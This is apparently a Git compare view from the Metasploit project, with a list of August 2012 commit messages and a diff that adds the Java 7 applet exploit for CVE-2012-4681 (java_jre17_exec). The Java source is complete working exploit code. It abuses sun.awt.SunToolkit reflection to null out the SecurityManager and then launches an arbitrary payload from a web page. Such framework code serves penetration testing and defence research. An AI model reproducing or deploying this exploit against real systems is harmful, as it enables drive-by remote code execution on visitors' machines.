Compare commits

...

16 Commits

Author SHA1 Message Date
Tod Beardsley f353c6e6db Merge branch 'master' into release
Almost certainly not going to be the final release, but this gets
through the merge conflict on the Java stuff.

Conflicts:
	modules/exploits/multi/browser/java_jre17_exec.rb
2012-08-28 10:26:24 -05:00
jvazquez-r7 78641d6afb Added java_jre17_exec 2012-08-27 09:51:55 -05:00
Tod Beardsley f38b0aeb5c Merge branch 'master' into release 2012-08-23 12:18:35 -05:00
Tod Beardsley b78468bb18 Merge branch 'master' into release 2012-08-22 16:22:27 -05:00
Tod Beardsley 7fa46809b6 Merge branch 'master' into release 2012-08-22 10:50:50 -05:00
Tod Beardsley b32fe957c3 Merge branch 'master' into release 2012-08-22 10:04:05 -05:00
Tod Beardsley 2abd79b312 Updating trusted_service_path from master
Now with more references.
2012-08-15 14:52:12 -05:00
Tod Beardsley 4ac6861bb4 Apostrophe 2012-08-15 14:19:41 -05:00
Tod Beardsley 582f98f90d Fix up description a little 2012-08-15 13:57:14 -05:00
Tod Beardsley 3d8712e3c1 Picking up sinn3r's fix for trusted_service_path 2012-08-15 13:51:01 -05:00
Tod Beardsley 118a9b1e0f Msftidy fix and adding OSVDB 2012-08-15 13:49:22 -05:00
Tod Beardsley c00200eb73 Recapitalizing GlobalSCAPE
According to

http://kb.globalscape.com/Search.aspx?Keywords=globalscape

this seems to be the preferred capitalization.
2012-08-15 13:24:44 -05:00
Tod Beardsley 4571e5aad1 Merge branch 'master' into release 2012-08-14 12:27:48 -05:00
Tod Beardsley 589fb3a942 Merge branch 'master' into release
Conflicts:
	modules/exploits/windows/local/current_user_psexec.rb

Resolved conflict by including Post::Common in psexec module.
2012-08-14 12:09:07 -05:00
Tod Beardsley 2596d543a1 Out of 4.4.0, and into 4.5.0-dev 2012-08-07 09:53:19 -05:00
Tod Beardsley 26ce017980 Msftidy.rb cleanup on recent modules.
Notably, DisclosureDate is required for other module parsers, so let's
not ignore those, even if you have to guess at the disclosure or call
the module's publish date the disclosure date.
2012-08-04 12:19:38 -05:00
3 changed files with 76 additions and 1 deletions
Binary file not shown.
+75
View File
@@ -0,0 +1,75 @@
//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
import metasploit.Payload;
public class Exploit extends Applet
{
public Exploit()
{
}
public void disableSecurity()
throws Throwable
{
Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
Permissions localPermissions = new Permissions();
localPermissions.add(new AllPermission());
ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
localProtectionDomain
});
SetField(Statement.class, "acc", localStatement, localAccessControlContext);
localStatement.execute();
}
private Class GetClass(String paramString)
throws Throwable
{
Object arrayOfObject[] = new Object[1];
arrayOfObject[0] = paramString;
Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
localExpression.execute();
return (Class)localExpression.getValue();
}
private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
throws Throwable
{
Object arrayOfObject[] = new Object[2];
arrayOfObject[0] = paramClass;
arrayOfObject[1] = paramString;
Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
localExpression.execute();
((Field)localExpression.getValue()).set(paramObject1, paramObject2);
}
public void init()
{
try
{
disableSecurity();
Payload.main(null);
}
catch(Throwable localThrowable)
{
localThrowable.printStackTrace();
}
}
public void paint(Graphics paramGraphics)
{
paramGraphics.drawString("Loading", 50, 25);
}
}
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
super( update_info( info,
'Name' => 'Java 7 Applet Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in Java 7, which allows an attacker to run
This module exploits a vulnerability in Java 7, which allows an attacker to run
arbitrary Java code outside the sandbox. The vulnerability seems to be related to
the use of the newly introduced ClassFinder#resolveClass in Java 7, which allows
the sun.awt.SunToolkit class to be loaded and modified. Please note this flaw is